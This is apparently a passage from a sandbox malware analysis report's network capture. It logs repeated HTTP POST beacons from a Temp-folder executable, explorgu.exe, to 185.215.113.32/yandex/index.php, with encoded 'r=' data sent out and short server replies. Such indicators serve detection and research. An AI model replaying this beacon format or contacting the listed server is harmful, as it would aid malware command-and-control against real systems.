                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:58.542016983 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:58 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:58.543395042 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:58.793211937 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:58 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            65192.168.2.449802185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:59.154320002 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:59.400758028 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:59.401647091 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:59.651264906 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            66192.168.2.449803185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:00.011738062 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:00.257059097 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:00 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:04:00.257925987 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:00.507282019 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:00 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            67192.168.2.449804185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:00.853451967 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:01.098215103 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:00 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:04:01.098963976 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:01.340943098 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            68192.168.2.449805185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:01.709240913 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:01.956159115 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:04:01.957067966 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:02.209158897 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:02 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            69192.168.2.449806185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:02.560158014 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:02.806850910 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:02 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:04:02.807677984 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:03.057637930 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:02 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            70192.168.2.449807185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:03.419625044 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:03.666261911 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            71192.168.2.449808185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:03.916187048 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:04.167092085 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:04 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            72192.168.2.449809185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:04.539887905 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:04.789437056 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:04 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            73192.168.2.449810185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:05.032119989 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:05.276875973 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            74192.168.2.449811185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:05.644427061 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:05.889847994 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            75192.168.2.449812185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:06.130336046 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:06.373567104 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            76192.168.2.449813185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:06.734533072 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:06.981038094 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            77192.168.2.449814185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:07.231739044 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:07.483933926 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            78192.168.2.449815185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:07.843009949 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:08.090029955 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            79192.168.2.449816185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:08.335453987 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:08.578005075 CET196INHTTP/1.1 200 OK
